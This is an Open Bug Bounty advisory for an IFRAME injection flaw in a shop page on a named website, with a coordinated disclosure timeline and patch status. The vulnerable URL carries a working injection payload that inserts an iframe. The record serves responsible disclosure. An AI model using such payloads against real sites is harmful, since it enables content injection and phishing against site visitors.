adels-archiv.com IFRAME Injection vulnerability

2017-10-17T07:10:00
ID OBB:340814
Type openbugbounty
Reporter keritzy
Modified 2017-11-23T21:02:00

Description

Vulnerable URL:
http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID;=5%27%3E%3Ciframe%20src=%22http://openbugbounty.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
Details:

Description| Value
---|---
Patched:| Yes, at 23.11.2017
Latest check for patch:| 23.11.2017 21:02 GMT
Vulnerability type:| IFRAME Injection
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 October, 2017 07:10 GMT
Generic security notifications sent to website owner| 17 October, 2017 07:48 GMT
Notification sent to subscribers (without technical details)| 17 October, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 23 November, 2017 06:33 GMT
Vulnerability patched by the website owner| 23 November, 2017 21:02 GMT